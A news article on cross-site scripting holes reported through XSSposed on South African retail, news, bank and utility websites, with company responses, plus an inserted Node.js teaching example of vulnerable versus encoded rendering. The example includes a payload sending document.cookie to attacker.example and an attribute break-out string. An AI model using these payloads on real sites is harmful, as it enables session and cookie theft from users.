Several prominent South African websites appear to have cross-site scripting (XSS) vulnerabilities, according to the online open bug bounty community XSSposed.
Established in 2014 as an XSS archive, XSSposed’s listings for SA websites grew substantially during July 2015.
XSS vulnerabilities occur when a web application includes input from a user in the page it generates without validating it or encoding it for the context in which it appears.
An XSS attack is a type of injection: it uses the vulnerable site to deliver a malicious script to a user, and because the script arrives as part of the site’s own page, the user’s browser has no way to tell that it should not be trusted and runs it with the site’s privileges.
In this way, attackers can read cookies (unless they are marked HttpOnly), session tokens, or other sensitive information retained by the browser for that site, or act on the site as the logged-in user.
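The following is an added example, not code from the article or from any of the sites it names, showing the search-page pattern described above in Node.js: a handler that pastes the query into the page unencoded, the same handler with output encoding, the attribute-context variant, and the response headers that limit what a successful injection can read. The payloads, the `attacker.example` host and all function names are constructed for the demonstration.

```javascript
// Added example (not from the article or any site it names).
// Reflected XSS in a search results page, beside the output-encoded form.

// Minimal HTML entity encoder. Encoding '&' first keeps the other
// replacements from being double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// VULNERABLE: the query is concatenated into the markup unencoded, so
// any tag the user supplied is parsed by the browser as page markup.
function renderSearchUnsafe(query) {
  return '<h1>Results for: ' + query + '</h1>';
}

// HARDENED: the same page, with the query encoded for the HTML text
// context before it is concatenated.
function renderSearchSafe(query) {
  return '<h1>Results for: ' + escapeHtml(query) + '</h1>';
}

// Attribute context. The value sits inside a quoted attribute, so the
// unsafe form lets a single '"' close the attribute and add new ones.
function renderSearchBoxUnsafe(query) {
  return '<input type="search" name="q" value="' + query + '">';
}

function renderSearchBoxSafe(query) {
  return '<input type="search" name="q" value="' + escapeHtml(query) + '">';
}

// The two input templates above emit exactly six '"' characters of
// their own; any extra one came from the user and ended the attribute.
function doubleQuoteCount(html) {
  return (html.match(/"/g) || []).length;
}

// Response headers that limit the damage if encoding is missed somewhere:
// HttpOnly keeps the session cookie out of document.cookie, and a CSP
// whose script-src lacks 'unsafe-inline' refuses to run an injected
// inline <script> block at all.
function hardenedHeaders(sessionId) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Set-Cookie': 'session=' + sessionId + '; HttpOnly; Secure; SameSite=Lax; Path=/',
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
  };
}

// Constructed payloads (hypothetical, not taken from any reported bug):
// the classic cookie-exfiltration proof of concept for the text context,
// and an attribute break-out for the input box.
const PAYLOAD =
  "<script>location='https://attacker.example/?c='+document.cookie</script>";
const ATTR_PAYLOAD = '" autofocus onfocus="alert(1)';

// Stand-alone demonstration.
console.log('unsafe text  :', renderSearchUnsafe(PAYLOAD));
console.log('safe text    :', renderSearchSafe(PAYLOAD));
console.log('unsafe attr  :', renderSearchBoxUnsafe(ATTR_PAYLOAD),
            'quotes =', doubleQuoteCount(renderSearchBoxUnsafe(ATTR_PAYLOAD)));
console.log('safe attr    :', renderSearchBoxSafe(ATTR_PAYLOAD),
            'quotes =', doubleQuoteCount(renderSearchBoxSafe(ATTR_PAYLOAD)));
console.log('headers      :', hardenedHeaders('constructed-session-id'));
```

Run it with `node xss-demo.js` (the filename is arbitrary). The unsafe text rendering carries the `<script>` tag through verbatim, the safe one turns it into `&lt;script&gt;` which the browser displays as text, and the quote count shows the attribute break-out succeeding only in the unencoded input box. Encoding must match the context (text, attribute, URL, JavaScript string); the same encoder is not correct in all of them, which is why template engines with context-aware auto-escaping are preferable to hand-rolled concatenation.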
Prominent SA websites exposed
Among the websites listed on XSSposed are South African e-commerce players Takealot, Makro, Game, OLX, Spree, Zando, and Raru.
Some of the vulnerabilities reported are already listed as fixed, while others are still in the “hold” phase, allowing sites to patch issues before they are disclosed.
Takealot.com had a vulnerability in its search system reported on 14 July 2015 which was patched on 4 August. A new vulnerability was reported on 27 July, which is still “on hold”.
Takealot was asked for feedback about the security flaws, but the company did not respond by the time of publication.
Raru had a vulnerability reported on 22 July which was patched on 24 July, and has already been publicly disclosed. Raru director Neil Smith said they patched the issue on the day they were alerted to it.
“From a technical side, the vulnerability wasn’t in the original site code, but introduced via changes we deployed later on,” said Smith. He said it shows how important it is to test new code for security holes before deployment.
Smith said their experience with XSSposed has been positive.
“It helps alert website owners to potential problems on their sites. We also appreciate having enough time to close the vulnerabilities before the info goes public.”
Zando said it fixed the vulnerability on its site within a day.
Makro digital executive Paul van de Waal said they recently updated their online store, including security enhancements, which may have resolved the vulnerabilities reported on XSSposed.
The vulnerabilities on Makro’s site were reported on 23 July, when Van de Waal said the previous version of their site was still online.
“Unfortunately, we have not had a chance to contact the researcher who submitted the requests so we cannot validate what issues were detected.”
He added that the work Makro does with its third-party security consultants makes it confident that there are no major security flaws on its site.
News websites, Autotrader, and Cars.co.za
Other websites with reported vulnerabilities included those for Son, BusinessDay Live, Sunday World, Timeslive, The Daily Sun, and Eyewitness News.
As with the e-commerce sites, many of the bugs have been patched already, while others are still on hold.
Autotrader and Cars.co.za were also reported to have security flaws. Asked for comment, Cars.co.za said it has implemented checks for XSS vulnerabilities. Autotrader had not commented by the time of publication.
Of some concern is the XSS vulnerability reported on the website for Standard Bank, which is still listed as unpatched.
The bank said it is aware of the issue and is deploying measures to mitigate any risk.
“We would like to emphasize that this is limited to the Standard Bank home page, which is essentially Standard Bank’s marketing interface,” a spokesperson said.
“Standard Bank’s Internet Banking portal is not impacted by this in any way. As such the integrity of our client information remains intact.”
Eskom’s website was listed as vulnerable to XSS attacks on 14 September 2014, and according to reports it is still vulnerable.
The utility was asked about the listed security problems with its website, but has not responded to requests for comment.
Update: Takealot has provided the following statement from its Co-CEO and CTO Willem Van Biljon.
At Takealot we take the security of our website extremely seriously. We have ongoing technology processes in place to monitor and repair any security vulnerabilities identified by our team or the wider technology community.
The security flaws reported on the website XSSposed on the 14th and 27th of July have been fixed by our technology team and we continue to take steps to improve the security of our website.
We are very grateful to the developer community who help us to identify any security flaws and remain committed to providing a safe environment where our customers can enjoy shopping with us.